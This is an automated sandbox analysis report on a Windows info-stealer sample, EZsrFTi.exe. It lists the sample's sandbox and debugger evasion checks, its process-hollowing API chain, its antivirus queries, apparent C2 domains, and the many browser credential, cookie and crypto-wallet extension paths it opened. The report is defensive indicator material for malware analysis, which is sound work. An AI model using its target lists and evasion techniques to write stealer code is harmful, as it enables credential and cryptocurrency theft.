                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\Desktop\EZsrFTi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSystem information queried: FirmwareTableInformationJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeMemory allocated: CA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeMemory allocated: 1070000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeWindow / User API: threadDelayed 6985Jump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exe TID: 7756Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exe TID: 8100Thread sleep count: 6985 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\Desktop\EZsrFTi.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\EZsrFTi.exeLast function: Thread delayed
                        Source: Amcache.hve.7.drBinary or memory string: VMware
                        Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
                        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                        Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: EZsrFTi.exe, 00000004.00000002.2539201362.0000000001439000.00000004.00000020.00020000.00000000.sdmp, EZsrFTi.exe, 00000004.00000002.2538762333.00000000013FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Users\user\Desktop\EZsrFTi.exeAPI call chain: ExitProcess graph end nodegraph_4-13739
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0043F050 LdrInitializeThunk,4_2_0043F050
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 0_2_029E8125 mov edi, dword ptr fs:[00000030h]0_2_029E8125
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 0_2_029E82A2 mov edi, dword ptr fs:[00000030h]0_2_029E82A2
                        Source: C:\Users\user\Desktop\EZsrFTi.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 0_2_029E8125 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_029E8125
                        Source: C:\Users\user\Desktop\EZsrFTi.exeMemory written: C:\Users\user\Desktop\EZsrFTi.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: growthselec.bond
                        Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: immolatechallen.bond
                        Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: crookedfoshe.bond
                        Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: strivehelpeu.bond
                        Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sobrattyeu.bond
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeQueries volume information: C:\Users\user\Desktop\EZsrFTi.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                        Source: EZsrFTi.exe, 00000004.00000002.2540317254.0000000003C4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
                        Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
                        Source: C:\Users\user\Desktop\EZsrFTi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: Process Memory Space: EZsrFTi.exe PID: 7732, type: MEMORYSTR
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: EZsrFTi.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.EZsrFTi.exe.620000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.EZsrFTi.exe.39e9550.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.EZsrFTi.exe.39e9550.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1292054697.0000000000622000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: EZsrFTi.exe, 00000004.00000002.2539201362.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                        Source: EZsrFTi.exe, 00000004.00000002.2539201362.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                        Source: EZsrFTi.exe, 00000004.00000002.2539201362.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                        Source: EZsrFTi.exe, 00000004.00000002.2539538724.0000000001487000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%
                        Source: EZsrFTi.exe, 00000004.00000002.2539623279.00000000014A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                        Source: EZsrFTi.exe, 00000004.00000002.2539201362.0000000001439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                        Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.jsJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.dbJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.jsonJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.dbJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
